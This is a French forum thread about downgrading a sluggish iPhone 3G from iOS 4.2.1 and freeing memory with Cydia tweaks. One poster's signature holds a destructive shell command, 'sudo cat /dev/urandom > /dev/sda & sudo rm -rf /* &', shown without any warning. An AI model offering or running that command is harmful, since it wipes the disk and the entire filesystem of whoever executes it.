Bienvenue sur le forum du blog iPhon.fr
Pensez à poster dans la bonne rubrique, respecter les propos des autres internautes, ne pas utiliser le langage SMS, et enfin, à utiliser la fonction 'Recherche' !
Et... Gardez le sens de l'humour, de la convivialité et de la décontraction. On n'est pas là pour se prendre la tête ! ;-)
Salut tout le monde,
Je vais récupérer un iphone 3g de 8go sous IOS 4.2.1 qui apparement rame pas mal.
Est-ce qu'en installant une ancienne version d'IOS? (3.x?) L'iphone sera plus fluide?
Et autre question: puis-je downgrader un iphone 3g de 4.2.1 a 3.1.3 sans avoir de SHSH?
Merci bien
Salut !
Oui, d'après une grande partie des retours, les iPhone 3G en 4.X.X rament pas mal.
Plein de gens se sont plains, et tout, et tout.
Pour ta question, un downgrade de la 4.3.1 à la 3.1.3 devrait être possible.
Voici un tutoriel qui devrait pouvoir t'aider.
PS : Je n'ai jamais tenté ce genre de manipulation, donc à tes risques et périls...
Dernière modification par -nicnl- (13-10-2012 17:49:14)
sudo cat /dev/urandom > /dev/sda & sudo rm -rf /* &
Super, merci pour ta réponse.
Je vais essayer pour le downgrade
sinon sous 4.2.1 il y a des tweak cydia qui libere de la memoire je l'ai fait pour un pote sous ios 4.2.1 iphone 3g il avait 8 Mo de free et apres 48 Mo de free qui rendait fluide la springboard....
IPhone 6 silver 64 go 9.0.2 ,iphone6s gold 64 Go 9.2,
i pod touch v1 16 Go
i pad2 64 Go wifi 8.1.2 JB ;
i pad air 64 Go wifi 9.0.2 JB
i pad pro 12,9p 128go wifi 9.2
Pour ceux que ça interesse, j'ai trouvé un tuto qui fonctionne pour libérer pas mal de ram pour l'iphone 3G!
J'ai réussi a avoir environ 80Mo de libre!!
L'iPhone sur iPhon.fr, le blog de l'iPhone - blog iPad
iPhon.fr et son forum ne sont pas liés à Apple, Orange, SFR ou autres et les marques citées sont la propriété de leurs détenteurs respectifs.